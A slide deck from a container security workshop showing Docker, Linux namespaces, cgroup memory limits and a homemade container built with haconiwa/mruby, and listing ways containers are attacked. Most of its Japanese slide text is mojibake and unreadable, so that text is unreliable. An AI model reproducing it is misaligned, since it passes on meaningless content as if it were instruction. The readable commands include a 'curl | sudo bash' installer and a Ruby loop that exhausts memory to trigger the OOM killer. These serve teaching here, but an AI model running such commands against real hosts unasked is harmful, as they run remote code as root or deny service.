コンテナのセキュリティを 中身から理解しよう / inside-out-container-and-its-security

by KONDO Uchio

Slide 1

Slide 1 text

օ͞Μ͸ɺVOTIBSF ͯ͠·͔͢ʁ ۙ౻Ӊஐ࿕৿ాߒฏ (.01FQBCP *OD ,ZVTIV4FDVSJUZ$POGFSFODF ίϯςφͷηΩϡϦςΟΛ  த਎͔Βཧղ͠Α͏

Slide 2

Slide 2 text

γχΞɾϓϦϯγύϧΤϯδχΞ ۙ౻ Ӊஐ࿕ / @udzura https://blog.udzura.jp/ Uchio Kondo ٕज़෦ ٕज़ج൫νʔϜ

Slide 3

Slide 3 text

LZVTFD

Slide 4

Slide 4 text

ຊ೔ͷखॱɺίʔυͳͲ IUUQTCJUMZLZVTFDQFQBCP

Slide 5

Slide 5 text

ΞδΣϯμ ίϯςφԾ૝ԽͬͯԿͩʁ ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏  dখٳܜd ίϯςφʹର͢Δ߈ܸͷߟ͑ํ  dٳܜd ࣮ફʂίϯςφ߈ܸϫʔΫγϣοϓ ೉қ౓ॳڃ ೉қ౓ॳʙதڃ ೉қ౓தڃ ೉қ౓্ڃ☠

Slide 6

Slide 6 text

ίϯςφԾ૝ԽͬͯԿͩʁ j IUUQTqJDLSQHK%S;:

Slide 7

Slide 7 text

࣍ͷιϑτ΢ΣΞΛ ஌͍ͬͯΔํ ࢖ͬͨ͜ͱ͕͋Δํʁ

Slide 8

Slide 8 text

No content

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

ࠓ೔ͷςʔϚ ίϯςφ

Slide 12

Slide 12 text

͍ΘΏΔԾ૝Խʢྫʣ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ IBSEXBSF FNVMBUJPO ήετ04 ϥΠϒϥϦ ϓϩάϥϜ IBSEXBSF FNVMBUJPO ήετ04 ϥΠϒϥϦ ϓϩάϥϜ IBSEXBSF FNVMBUJPO ήετ04 ϥΠϒϥϦ ϓϩάϥϜ 04ͷػೳΛ ͦΕͧΕ४උ

Slide 13

Slide 13 text

ίϯςφܕʮԾ૝Խʯ ϋʔυ΢ΣΞ ϗετ04ʢ-JOVYʣ ίϯςφ Τϯδϯ ϥΠϒϥϦ ϓϩάϥϜ ίϯςφ Τϯδϯ ϥΠϒϥϦ ϓϩάϥϜ ίϯςφ Τϯδϯ ϥΠϒϥϦ ϓϩάϥϜ 04ͷػೳ͸ ڞ௨Ͱ࢖͏

Slide 14

Slide 14 text

ίϯςφͷ࣮૷

Slide 15

Slide 15 text

୅දత࣮૷

Slide 16

Slide 16 text

ίϯςφͷϝϦοτ

Slide 17

Slide 17 text

ىಈ͕ΑΓߴ଎ɺܰྔ ϦιʔεΛࡉ੍͔͘ޚՄೳ ˠΫϥ΢υɺ*P5ʹ޲͍͍ͯΔ

Slide 18

Slide 18 text

ٯʹɺσϝϦοτ͸ʁ

Slide 19

Slide 19 text

෼཭͕͍ΘΏΔ7.ͱൺ΂ʮऑ͍ʯ 7.࡞੒͢ΔԾ૝Խ ϋΠύʔόΠβܕ ιϑτ΢ΣΞܕ ίϯςφܕԾ૝Խ ϛυϧ΢ΣΞͷதͰ ݖݶ෼཭͢ΔλΠϓ 7JSUVBM)PTU౳ ऑ͍▶ ◀ڧ͍ ݖݶ෼཭ ྑ͍▶ ◀ѱ͍ Ϧιʔεޮ཰ ʜʜ ʜʜ ʜʜ ʜʜ

Slide 20

Slide 20 text

ηΩϡϦςΟ ॏཁ

Slide 21

Slide 21 text

ίϯςφͷηΩϡϦςΟΛԡ͑͞Α͏ wίϯςφࣗମɺଞͷٕज़ͱൺ΂͘͝࠷ۙग़͖ͯͨ΋ͷͰ͋Δ w৘ใ΋ӡ༻࣮੷΋·ͩ·ͩগͳ͍ wͰ΋ɺࠓޙ͔ܽͤͳ͍ٕज़ʹͳΔͷͰɺηΩϡϦςΟΛ͔ͬ͠Γԡ͞ ͑ͯଞͷΤϯδχΞͱࠩΛ͚ͭ·͠ΐ͏ wʢ͚͍ͭͯΔͱ͸ݴ͍ͬͯͳ͍ʣ

Slide 22

Slide 22 text

ίϯςφͷ࢓૊ΈΛ ͷ͍ͧͯΈΑ͏ j IUUQTqJDLSQ3BTU

Slide 23

Slide 23 text

ϫʔΫγϣοϓ લ൒ ͷΞδΣϯμ %PDLFSͷΠϯετʔϧ ʮίϯςφ͸ϓϩηεʯͷ֬ೝ -JOVY/BNFTQBDFͷ֬ೝͱ࣮श DHSPVQͷ֬ೝͱ࣮श ؆୯ͳίϯςφΛࣗ࡞ͯ͠Έ·͠ΐ͏ ҰॹʹखΛಈ͔ͭͭ͠ ݟͯΈ·͠ΐ͏ ϓϩάϥϛϯά ͯ͠Έ·͠ΐ͏ʂ ࠲ֶ w શମͷղઆ

Slide 24

Slide 24 text

ίϯςφ͸ Ͳ͏΍ͬͯ ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

Slide 25

Slide 25 text

࣍ͷը໘Λ ݟͨ͜ͱ͕͋Δํʁ

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

No content

Slide 28

Slide 28 text

-JOVYͰϓϩάϥϜΛಈ͔͍ͨ͠ʂ γΣϧ CBTIͳͲ -JOVY Χʔωϧ ϓϩάϥϜ ϓϩάϥϜ ࢦࣔ γεςϜ ίʔϧ ϓϩηεͷ ࡞੒ ͓࢓ࣄ ܭࢉ 04

Slide 29

Slide 29 text

-JOVYͷʮϓϩηεʯ ਌ϓϩηε CBTIଞ ࢠϓϩηε ৽͍͠ ϓϩάϥϜ GPSL FYFDWF XBJU

Slide 30

Slide 30 text

ίϯςφ͸ʮಛघͳϓϩηεʯ ਌ϓϩηε CBTIଞ ࢠϓϩηε ৽͍͠ ϓϩάϥϜ GPSL FYFDWF XBJU 04ͷʮίϯςφԽػೳʯ ʢγεςϜίʔϧʣ

Slide 31

Slide 31 text

ʮಛघʯͱ͸ʁ

Slide 32

Slide 32 text

ී௨ͷϓϩηεͱίϯςφͷҧ͍ wίϯςφ͸ɺಛघͳϓϩηεͰ͋Δͱߟ͑ΒΕΔɻ w۩ମతʹ͸ɺ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ɺ  ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ  ͜ͱͰɺݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ w ͷͨΊͷػೳͷ୅ද͕-JOVY/BNFTQBDFɺ  ͷͨΊͷػೳͷ୅ද͕DHSPVQͰ͋Δɻ

Slide 33

Slide 33 text

ίϯςφͷͳ͍ੈքͷ04 ΈΜͳ͕޷͖উखʹ ࢓ࣄͷʮࡐྉʯΛ࢖ͬͯ͠·͏ ۠ผͳ͘࡞ۀΛ͢ΔͷͰ Ϳ͔ͭͬͨΓඇޮ཰ ͓࢓ࣄΛ͢Δਓ ʢϓϩηεʣ ࡐྉ ʢ04Ϧιʔεʣ $16 ϝϞϦ ˞ͬ͘͟Γͨ͠ྫ͑Ͱ͢

Slide 34

Slide 34 text

࡞ۀΛ҆શɾޮ཰Խ͢ΔͨΊ wʮ࡞ۀͷ෦԰ʯΛ෼͚Δඞཁ͕͋Δ

Slide 35

Slide 35 text

࡞ۀΛ҆શɾޮ཰Խ͢ΔͨΊ wʮ࡞ۀͷͨΊͷࡐྉͷׂΓৼΓʯ΋໌֬ʹ͍ͨ͠ άϧʔϓ" # $ άϧʔϓ" # $ " # $

Slide 36

Slide 36 text

खΛಈ͔ͯ͠ ݟͯΈ·͠ΐ͏

Slide 37

Slide 37 text

൝෼͚ wਓ਺΋ଟ͍ͷͰɺʢࢀՃ͍ͨ͠ํ͸ʣͬ͘͟ΓલޙͷਓͨͪͰ൝Θ͚ ͱ͍͏ܗʹ͠·͢ɻ w٧Ίͯ࠲͍ͬͯͩ͘͞ʂ w൝ͷํʑͰɺڠྗ͋ͬͯ͠ਐΊͯΈ͍ͯͩ͘͞ɻ wͨ·ʹ౰ͯ·͢ɻ

Slide 38

Slide 38 text

%PDLFSͷΠϯετʔϧ

Slide 39

Slide 39 text

%PDLFSΛΠϯετʔϧ wʢࣄલΠϯετʔϧ͞Εͨํ͸লུՄೳͰ͢ʣ w͝४උ͍͍ͯͨͩͨ͠6CVOUV9FOJBMʹɺެࣜͷखॱͰEPDLFSDF ύοέʔδΛೖΕ͍ͯͩ͘͞ɻ w ˠIUUQTEPDTEPDLFSDPNJOTUBMMMJOVYEPDLFSDFVCVOUV w ΠϯετʔϧޙɺҎԼͷίϚϯυΛଧ͓ͬͯ͘ͱTVEP͕ෆཁʹͳָͬͯͰ͢ sudo gpasswd -a vagrant docker

Slide 40

Slide 40 text

֬ೝ

Slide 41

Slide 41 text

ʮίϯςφ͸ϓϩηεʯ ͷ֬ೝ

Slide 42

Slide 42 text

%PDLFS্ͰBQBDIFΛಈ͔ͦ͏ FROM ubuntu:xenial ENV DEBIAN_FRONTEND noninteractive RUN apt-get -q -y update && apt-get -q -y install apache2 EXPOSE 80 CMD ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] $ docker build -t kyusec-1 udzura/section-2 wҎԼͷΑ͏ʹ%PDLFSpMFΛ࡞੒͢Δ TBNQMF%PDLFSpMF wҎԼͷΑ͏ʹJNBHFΛϏϧυ͢Δ

Slide 43

Slide 43 text

ίϯςφΛ্ཱͪ͛Δ $ docker run -p 8080:80 -d kyusec-1 $ curl localhost:8080 -s | grep '' Apache2 Ubuntu Default Page: It works wҎԼͰBQBDIFͷίϯςφ্ཱ͕͕ͪΓɺΞΫηεͰ͖Δɻ

Slide 44

Slide 44 text

Ұॹʹ΍ͬͯΈΑ͏ $ ps auxf wB ࣍ͷίϚϯυͰEPDLFS͕࡞ΔϓϩηεπϦʔΛ֬ೝ͠Α͏ $ sudo apt-get install apache2 && systemctl start apache2 wC ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈΔɻ  ɹϓϩηεπϦʔΛൺֱ͠Α͏

Slide 45

Slide 45 text

-JOVY/BNFTQBDF

Slide 46

Slide 46 text

ʮ෦԰ʯͷଘࡏΛ ֬ೝ͠Α͏

Slide 47

Slide 47 text

-JOVY/BNFTQBDFΛʮ؍࡯ʯ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND ... NAMES 88b7e296fe92 kyusec-1 "/usr/sbin/apache2..." ... angry_rosalind $ docker exec -ti 88b7e296fe92 bash wઌ΄Ͳ্ཱͪ͛ͨίϯςφͷ*%Λ֬ೝ͠ɺʮΞλονʯ͢Δ # ip a wͦͷঢ়ଶͰίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ wͦͷωοτϫʔΫͱɺϗετͷωοτϫʔΫΛൺֱ͢Δɻ # exit $ ip a

Slide 48

Slide 48 text

ίϯςφͷதɺಠཱͨ͠ωοτϫʔΫ͕͋Δ wઌ΄Ͳ֬ೝͨ͠Α͏ʹίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηεɻ  ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫׂ͕Γ౰͍ͨͬͯΔɻ

Slide 49

Slide 49 text

/BNFTQBDF͸ଞʹ΋͋Δ w͍ͭͮͯɺϗετ໊΋ಠཱ͍ͯ͠Δ͜ͱΛ֬ೝ͠Α͏  ίϯςφ಺෦ͷϗετ໊΋มߋͯ͠ΈΑ͏ $ docker exec -ti 88b7e296fe92 hostname $ hostname

Slide 50

Slide 50 text

/BNFTQBDF͸ଞʹ΋͋Δ wϓϩηεʹ͸ϓϩηε*%ʢ1*%ʣ͕͋Δ͕ɺ  ͦͷ࠾൪͕ʮಠཱ͍ͯ͠Δʯ͜ͱΛݟͯΈΑ͏ wಉ͡ϓϩηεʹҧ͏1*%ׂ͕ΓৼΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti 88b7e296fe92 ps auxf $ ps auxf

Slide 51

Slide 51 text

/BNFTQBDF͸ Ͳ͜Ͱ֬ೝͰ͖Δʁ

Slide 52

Slide 52 text

Ұॹʹ΍ͬͯΈΑ͏ $ ps auxf | grep -A 6 docker[d] # ώϯτͱͳΔίϚϯυ wB ίϯςφͷʮϗετ͔Βݟͨʯ1*%Λಥ͖ࢭΊΑ͏ɻ $ sudo ls -l /proc/$PID/ns # $PID ͸ίϯςφͷPID wC QSPDGTʹ͍ͭͯௐ΂ɺҎԼͷσΟϨΫτϦΛ֬ೝ͠Α͏ $ sudo ls -l /proc/self/ns wD ϗετͷQSPD1*%OTͱͲ͏ҧ͏͔ɺ໨EJ⒎͠Α͏

Slide 53

Slide 53 text

No content

Slide 54

Slide 54 text

Ұॹʹ΍ͬͯΈΑ͏ ଓ͖ $ sudo nsenter --net -t $PID wE ωοτϫʔΫ໊લۭؒʮͷΈʯʹΞλονͯ͠ΈΑ͏ɻ  ɹΞλονޙɺҎԼΛ֬ೝ͠Α͏  ɹE ip aͷ࣮ߦ݁Ռ͸ϗετEPDLFSͱൺ΂Ͳ͏͔ʁ  ɹE hostnameͷ࣮ߦ݁Ռ͸Ͳ͏͔ʁ wˠ෦԰ʹ͸͞Βʹ಺෦Ͱͷʮ෼ྨʯ͕͋Δ

Slide 55

Slide 55 text

DHSPVQ

Slide 56

Slide 56 text

ʮ࢓ࣄͷࡐྉʯ͸ ͲͷΑ͏ʹׂΓৼΒΕΔʁ

Slide 57

Slide 57 text

Ұॹʹ΍ͬͯΈΑ͏ $ CID=$(docker inspect -f '{{.ID}}' 88b7e296fe92) $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes wB ͖ͬ͞ͷίϯςφͷʮϝϞϦͷׂΓ౰ͯʯΛ֬ೝ͠Α͏ wC ΑΓɺׂΓ౰ͯͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=4m -d kyusec-1); echo $CID2 $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

Slide 58

Slide 58 text

͞Βʹ΍ͬͯΈΑ͏ $ docker exec -ti $CID bash $ docker exec -ti $CID2 bash wD ϝϞϦׂΓ౰੍ͯݶͳ͠ɺ੍ݶ͋ΓɺͷίϯςφʹͦΕͧΕೖΓɺ  BQUͳͲͷૢ࡞Λͯ͠ɺͲͪΒ͕ڍಈ͕஗͍͔ൺֱͯ͠ΈΑ͏ wE ௚઀ϝϞϦͷׂΓ౰ͯΛมߋ͠ɺϝϞϦṧഭతͳڍಈ͕  վળ͢Δ͜ͱΛ֬ೝͯ͠ΈΑ͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@ebb02470253b:/# apt install ruby ...

Slide 59

Slide 59 text

͞Βʹ΍ͬͯΈΑ͏ Ԡ༻ฤ $ sudo mkdir /sys/fs/cgroup/memory/kyusec-2 $ sudo ls -l /sys/fs/cgroup/memory/kyusec-2 $ echo 0 | sudo tee /sys/fs/cgroup/memory/kyusec-2/memory.swappiness $ echo 4m | sudo tee /sys/fs/cgroup/memory/kyusec-2/memory.limit_in_bytes $ echo $$ | sudo tee /sys/fs/cgroup/memory/kyusec-2/tasks $ ruby -e \ 'GC.disable;ha=Hash.new;loop{1000.times{ha[rand(2**20).to_s.to_sym]=rand(2**20).to_s.to_sym}}' $ echo 1g | sudo tee /sys/fs/cgroup/memory/kyusec-2/memory.limit_in_bytes # ׂΓ౰ͯΛม͑Δ $ ruby -e \ 'GC.disable;ha=Hash.new;loop{1000.times{ha[rand(2**20).to_s.to_sym]=rand(2**20).to_s.to_sym}}' # ଈࢮ͠ͳ͍͜ͱ͕֬ೝͰ͖Δ wF DHSPVQΛࣗ෼Ͱ࡞ͬͯɺ஋Ληοτͯ͠ΈΔɻ  ͦͷ؀ڥͰ00.,JMMFSΛൃಈͤͯ͞ΈΑ͏

Slide 60

Slide 60 text

DHSPVQͰίϯτϩʔϧͰ͖ΔϦιʔε w$16ɺϝϞϦɺσΟεΫ*0ͷଳҬɺϓϩηε਺ɺͳͲ  w௥Ճ՝୊QJETDPOUSPMMFSΛར༻͠ɺίϯςφ಺෦ͰͷʮGPSLCPNCʯ Λ๷͍ͰΈΑ͏ɻ  ʢ͕࣌ؒ͋Ε͹ɺҰॹʹσϞΛ΍ͬͯΈ·͢ʣ

Slide 61

Slide 61 text

؆୯ͳίϯςφΛ ࣗ࡞ͯ͠ΈΑ͏

Slide 62

Slide 62 text

ࣄલ४උ)BDPOJXBͷΠϯετʔϧ $ curl -s https://packagecloud.io/install/repositories/udzura/haconiwa/script.deb.sh \ | sudo bash $ sudo apt-get install haconiwa=0.10.0~alpha2-1 $ haconiwa version haconiwa: v0.10.0.alpha2 w)BDPOJXB!VE[VSBΒʹΑΓ։ൃ͞ΕͨɺNSVCZͰ  ઃఆ΍ϑοΫΛهड़Ͱ͖Δ-JOVYίϯςφϥϯλΠϜɻ w6CVOUVʹWFSTJPOBMQIBΛೖΕΑ͏ IUUQTQBDLBHFDMPVEJPVE[VSBIBDPOJXB

Slide 63

Slide 63 text

ࣄલ४උΠϝʔδʢSPPUGTʣΛ࡞Δ $ sudo mkdir -p /tmp/haconiwa/kyusec-3 $ docker export 88b7e296fe92 | \ sudo tar -xv -f - -C /tmp/haconiwa/kyusec-3 $ sudo chroot /tmp/haconiwa/kyusec-3 root@localhost:/# ls -l / total 76 drwxr-xr-x 2 root root 4096 Sep 25 07:52 bin drwxr-xr-x 2 root root 4096 Apr 12 2016 boot drwxr-xr-x 4 root root 4096 Sep 25 07:53 dev ...

Slide 64

Slide 64 text

؆୯ͳίϯςφΛ࡞ͬͯΈΑ͏ $ sudo haconiwa init --bridge; haconiwa init kyusec-3.haco # ҎԼͷߦΛ௥Ճɺฤू Haconiwa.define do |config| #... config.init_command = ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] #... root = Pathname.new("/tmp/haconiwa/kyusec-3") #... config.network.container_ip = "10.0.0.10" config.network.namespace = config.name  #... config.capabilities.allow "cap_net_bind_service" config.capabilities.allow "cap_kill" end

Slide 65

Slide 65 text

ىಈͯ͠ΈΑ͏ $ sudo haconiwa run kyusec-3.haco Create lock: # Container fork success and going to wait: pid=10494 AH00557: apache2: apr_sockaddr_info_get() failed for haconiwa-902340a9 AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message ## ผλʔϛφϧͰ $ curl -s 10.0.0.10 | grep '' Apache2 Ubuntu Default Page: It works

Slide 66

Slide 66 text

εΫϥονͰ ࡞ͬͯΈΑ͏

Slide 67

Slide 67 text

IBDPSCIBDPJSCίϚϯυ $ hacorb --version mruby 1.4.0 (2018-1-16) $ hacoirb mirb - Embeddable Interactive Ruby Shell > puts Dir.pwd /home/vagrant => nil

Slide 68

Slide 68 text

$POUBJOFS 1SPHSBNNJOH ೖ໳

Slide 69

Slide 69 text

Ұॹʹ 3VCZͷίʔυΛ ॻ͍ͯΈ·͢ʢWJNͰʣ

Slide 70

Slide 70 text

·ͣ͸ɺGPSLFYFDDISPPU͢Δ͚ͩ pid = Process.fork do Dir.chroot "/tmp/haconiwa/kyusec-3" Dir.chdir "/" Exec.execve ENV, "/usr/sbin/apache2ctl", "-D", "FOREGROUND" end p(Process.waitpid2 pid) $ sudo hacorb udzura/section-2/mycon.rb AH00557: apache2: apr_sockaddr_info_get() failed for localhost ... # ผλʔϛφϧ $ curl localhost -s | grep title Apache2 Ubuntu Default Page: It works [udzura/section-2/mycon.rb]

Slide 71

Slide 71 text

ωοτϫʔΫͷ४උ $ sudo ip netns add kyusec-3-demo $ sudo ip link add kyusec-3-host type veth peer name kyusec-3-guest $ sudo brctl addif haconiwa0 kyusec-3-host $ sudo ip link set kyusec-3-guest netns kyusec-3-demo up $ sudo ip link set kyusec-3-host up $ sudo ip netns exec kyusec-3-demo ip link set lo up $ sudo ip netns exec kyusec-3-demo ip addr add 10.0.0.20/24 dev kyusec-3-guest $ ping 10.0.0.20

Slide 72

Slide 72 text

/BNFTQBDFΛಠཱͤ͞Δ --- sample1/mycon.rb.rev1 2018-09-25 23:27:55.342689233 -0700 +++ sample1/mycon.rb 2018-09-25 23:30:32.719900439 -0700 @@ -1,4 +1,8 @@ pid = Process.fork do + Namespace.setns( + Namespace::CLONE_NEWNET, + fd: File.open("/var/run/netns/kyusec-3-demo", 'r').fileno + ) Dir.chroot "/tmp/haconiwa/kyusec-3" Dir.chdir "/" Exec.execve ENV, "/usr/sbin/apache2ctl", "-D", "FOREGROUND" $ curl localhost curl: (7) Failed to connect to localhost port 80: Connection refused $ curl 10.0.0.20 -s | grep title Apache2 Ubuntu Default Page: It works [udzura/section-2/mycon.rb] diff

Slide 73

Slide 73 text

DHSPVQͰϝϞϦ੍ݶΛ͢Δ --- sample1/mycon.rb.rev2 2018-09-25 23:33:37.330883578 -0700 +++ sample1/mycon.rb 2018-09-25 23:37:44.894926446 -0700 @@ -1,4 +1,9 @@ +limit = ENV['MEMORY_LIMIT'] || "128m" pid = Process.fork do + Dir.mkdir "/sys/fs/cgroup/memory/kyusec-3-demo" rescue nil + system "echo 0 > /sys/fs/cgroup/memory/kyusec-3-demo/memory.swappiness" + system "echo #{limit} > /sys/fs/cgroup/memory/kyusec-3-demo/memory.limit_in_bytes" + system "echo #{Process.pid} > /sys/fs/cgroup/memory/kyusec-3-demo/tasks" Namespace.setns( Namespace::CLONE_NEWNET, fd: File.open("/var/run/netns/kyusec-3-demo", 'r').fileno $ sudo hacorb udzura/section-2/mycon.rb $ sudo env MEMORY_LIMIT='1m' hacorb udzura/section-2/mycon.rb # ൺֱ͠Α͏ [udzura/section-2/mycon.rb] diff

Slide 74

Slide 74 text

εΫϦϓτશମ limit = ENV['MEMORY_LIMIT'] || "128m" pid = Process.fork do Dir.mkdir "/sys/fs/cgroup/memory/kyusec-3-demo" rescue nil system "echo 0 > /sys/fs/cgroup/memory/kyusec-3-demo/memory.swappiness" system "echo #{limit} > /sys/fs/cgroup/memory/kyusec-3-demo/memory.limit_in_bytes" system "echo #{Process.pid} > /sys/fs/cgroup/memory/kyusec-3-demo/tasks" Namespace.setns( Namespace::CLONE_NEWNET, fd: File.open("/var/run/netns/kyusec-3-demo", 'r').fileno ) Dir.chroot "/tmp/haconiwa/kyusec-3" Dir.chdir "/" Exec.execve ENV, "/usr/sbin/apache2ctl", "-D", "FOREGROUND" end p(Process.waitpid2 pid) [sample/mycon.rb] all

Slide 75

Slide 75 text

͜͜·Ͱͷ·ͱΊ wίϯςφ͸ɺ04͔ΒݟΔͱ௨ৗͷϓϩηεͰ͋Δ w04ͷίϯςφԽͷػೳΛ૊Έ߹ΘͤͯɺϓϩηεͷಠཱੑΛߴΊɺ ಠࣗʹϦιʔεΛׂΓ౰ͯͯɺ7.ͷΑ͏ʹ࢖͏͜ͱ͕Ͱ͖Δ wίϯςφԽͷػೳ͸ͨ͘͞Μ͋Δ wجຊʮγεςϜίʔϧʯͰ͋ΔͷͰɺϓϩάϥϛϯάͰ͍͡ΕΔ

Slide 76

Slide 76 text

ٳܜ

Slide 77

Slide 77 text

ίϯςφʹର͢Δ߈ܸͷߟ͑ํ j IUUQTqJDLSQ-UJ

Slide 78

Slide 78 text

ίϯςφͷத਎͸׬શʹཧղͨ͠ w͋ΒͨΊ্͔ͯΒԼ·ͰோΊͯΈΑ͏

Slide 79

Slide 79 text

VE[VSB!84"ݚͷࢿྉΑΓ IUUQTVE[VSBIBUFOBCMPHKQFOUSZ

Slide 80

Slide 80 text

ͲͷΑ͏ͳ؍఺Ͱ ߈ܸରࡦΛߟ͑Ε͹ྑ͍͔

Slide 81

Slide 81 text

04Χʔωϧࣗମͷ੬ऑੑΛͭ͘

Slide 82

Slide 82 text

04Χʔωϧࣗମͷ੬ऑੑΛͭ͘ wίϯςφ͸ҰൠͷϓϩηεͷଐੑΛมߋ࣮ͯ͠ݱ͞ΕΔɻ͢ͳΘͪɺ ϗετ04͔ΒݟΔͱ௨ৗͷϓϩηεʹա͗ͳ͍ɻ wΑͬͯɺϗετ04Χʔωϧʹ੬ऑੑ͕͋ΔͱɺͦͷӨڹΛड͚Δɻ wྫΧʔωϧΤΫεϓϩΠτݖݶঢ֨Ͱݟ͑ͳ͍΋ͷ͕ݟ͑ͯ͠·͏ wྫ%P4ίϯςφͷத͔ΒɺϗετͷՄ༻ੑʹӨڹΛ༩͑ΔͱɺϗεςΟ ϯάͷ৔߹ͳͲʹଞͷϢʔβʹӨڹΛ༩͑ͯ͠·͏

Slide 83

Slide 83 text

':*$POUBJOFS0QUJNJ[FE04 w(,&ͷྫ w IUUQTDMPVEHPPHMFDPNDPOUBJOFSPQUJNJ[FEPTEPDTDPODFQUTTFDVSJUZ IMKB wϛυϧ΢ΣΞɺϢʔβɺΧʔωϧΦϓγϣϯͳͲΛ࠷௿ݶͷઃఆʹ͠ ͍ͯΔɻ͜ΕʹΑΓɺߋ৽Λ༰қʹ͢Δɺ༨ܭͳ߈ܸΛड͚ͮΒ͘͢ ΔɺͳͲଟ͘ͷϝϦοτ͕͋Δ

Slide 84

Slide 84 text

ίϯςφԽͷػೳͷෆඋɺൈ͚݀Λͭ͘

Slide 85

Slide 85 text

ίϯςφԽͷػೳͷෆඋɺൈ͚݀Λͭ͘ wίϯςφ͸ɺઆ໌ͨ͠௨Γɺ͍͔ͭ͘ͷݖݶ෼཭ɺಠཱԽͷͨΊͷػ ೳͷ૊Έ߹ΘͤͰ͋Δɻ w͜ΕΒͷػೳͷཧղ͕؁͍ͱɺෆ༻ҙʹઃఆΛ؇࿨ͯ͠͠·͍߈ܸʹ ͭͳ͕Δ৔߹͕͋Δ w FHdocker run --privileged wݪଇͱͯ͠ίϯςφଆͰ๷͙΂͖ʮ݀ʯΛ๷͍͛ͯͳ͔ͬͨ৔߹΋͋ Δɻ͜Ε͸ϥϯλΠϜଆͷ੬ऑੑͱͳͬͯ͠·͏ w FHίϯςφ಺෦͔Βͷ/proc/acpi΁ͷ߈ܸͷྫ https://jvndb.jvn.jp/ja/contents/2018/JVNDB-2018-007686.html

Slide 86

Slide 86 text

*OUSPEVDUJPOUP$POUBJOFS4FDVSJUZ w%PDLFSެࣜͷɺηΩϡϦςΟ؍఺͔Βͷίϯςφػೳͷղઆɻ wࠓ೔࿩ͨ͠Α͏ͳ಺༰͕ৄ͘͠ࡌ͍ͬͯΔ w IUUQTXXXEPDLFSDPNTJUFTEFGBVMUpMFT81@*OUSPUP$POUBJOFS4FDVSJUZ@QEG wۙ౻͏͓ͪ͞ΜͷࢿྉͰ΋·ͱΊ͍ͯΔɻࢀরͷ͜ͱ w IUUQTVE[VSBIBUFOBCMPHKQFOUSZ

Slide 87

Slide 87 text

ωοτϫʔΫͳͲͷઃఆෆඋΛͭ͘

Slide 88

Slide 88 text

ωοτϫʔΫͳͲͷઃఆෆඋΛͭ͘ wίϯςφಉ࢜͸ɺෳ਺ͷίϯςφΛ૊Έ߹Θͤͯར༻͢Δͷ͕ී௨ wͦͷͨΊʢΫϥ΢υϓϥοτϑΥʔϜͳͲಉ༷ʣΞΫηεݖݶͷઃఆ Λ͢Δඞཁ͕͋ΔɻDGηΩϡϦςΟάϧʔϓ wωοτϫʔΫతͳ΋ͷͰ͸ w ,VCFSOFUFTͷɺ3#"$ϕʔεͷωοτϫʔΫ੍ݶ w αʔϏεϝογϡͷಋೖΑΔΞΫηε੍ݶɺྲྀྔ੍ݶ w DHSPVQͷOFU@DMTίϯτϩʔϥʴUDJQUBCMFT

Slide 89

Slide 89 text

':*αʔϏεϝογϡ w ϩάɺΞΫηείϯτϩʔϧɺτϨʔγϯάͳͲͷϏδωεϩδοΫ͔Β཭Εͨ໰୊ ΛɺίϯςφؒͷωοτϫʔΫ૚Ͱղܾ͢Δߟ͑ํɻ w ྫ͑͹αΠυΧʔίϯςφʢίϯςφʹ෇ଐ͢ΔίϯςφʣͳͲʹϓϩΫγΛཱͯɺ ͢΂ͯͷ)551ΞΫηεΛܦ༝ͤ͞Δ͜ͱͰɺωοτϫʔΫϨϕϧͰͷΞΫηε੍ݶ ΍ྲྀྔ੍ޚΛ͓͜ͳ͏ɻ IUUQTCMPHFOWPZQSPYZJPTFSWJDFNFTIEBUBQMBOFWTDPOUSPMQMBOFFGGD

Slide 90

Slide 90 text

ʢΞϓϦέʔγϣϯࣗମͷ੬ऑੑΛͭ͘ʣ ˞͜ͷ৔߹ɺҰൠͷΞϓϦέʔγϣϯʹ͋Δ੬ऑੑͱಉ༷ͷٞ࿦ͱͳΔɻলུ

Slide 91

Slide 91 text

':*εΠενʔζϞσϧ wίϯςφʹؔ͢ΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳͱͯ͠ॏෳ͍ͯ͠Δ ΋ͷ΋͋ΔʢFY$BQBCJMJUZͱTFDDPNQͷ྆ํͰɺDISPPUૢ࡞Λې ࢭͰ͖ΔͳͲʣ wҰํͰɺෳ਺ͷػߏΛ༻͍ͯૢ࡞Λ੍ݶ͢Δ͜ͱͰɺ͋Δػೳ͕੬ऑ ੑͳͲͰόΠύε͞Εͯ͠·ͬͯ΋ɺผͷػೳͰ߈ܸΛ๷͙؇࿨͢Δ ͜ͱ͕Ͱ͖Δ

Slide 92

Slide 92 text

࣮ફʂ ίϯςφ߈ܸϫʔΫγϣοϓ j IUUQTqJDLSQDH+/

Slide 93

Slide 93 text

!NSUDʹότϯλον

Slide 94

Slide 94 text

#SFBLPVU GSPN $POUBJOFS IUUQTqJDLSQCIWS7

